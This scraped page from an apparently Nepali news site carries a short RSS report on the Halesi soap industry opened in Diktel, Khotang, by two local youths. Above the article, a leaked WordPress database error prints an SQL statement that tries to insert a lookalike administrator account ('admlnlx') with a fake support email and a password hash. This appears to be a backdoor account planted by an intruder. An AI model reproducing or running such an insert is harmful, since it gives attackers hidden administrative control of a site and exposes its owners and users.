WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BIYiGLAOoiFLsWyuxZ2chcShHjT8yR0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 18:03:08', '', 'admlnlx', 'admlnlx')
खोटाङ,पुस ६-
यहाँका दुई युवाको सक्रियतामा दिक्तेलमा साबुन उद्योग सञ्चालनमा आएको छ ।
दिक्तेल नगरपालिका– ९ का सुरेश कार्की र नरेन्द्र कार्कीको संयुक्त पहलमा हलेसी साबुन उद्योग सञ्चालन गरिएको छ । काठमाडौाबाट कच्चा पदार्थ ल्याई सो साबुन उद्योग सञ्चालन गरिएको हो ।
उद्योगका सञ्चालक सुरेश कार्कीका अनुसार रु सात लाखको लागतमा डल्लो र आयताकार साबुन उत्पादन भइरहेको छ । तीनवटा साबुन राखिएको एक किलो बराबरको एउटा प्याकेटको मूल्य रु ९० तोकिएको छ । – रासस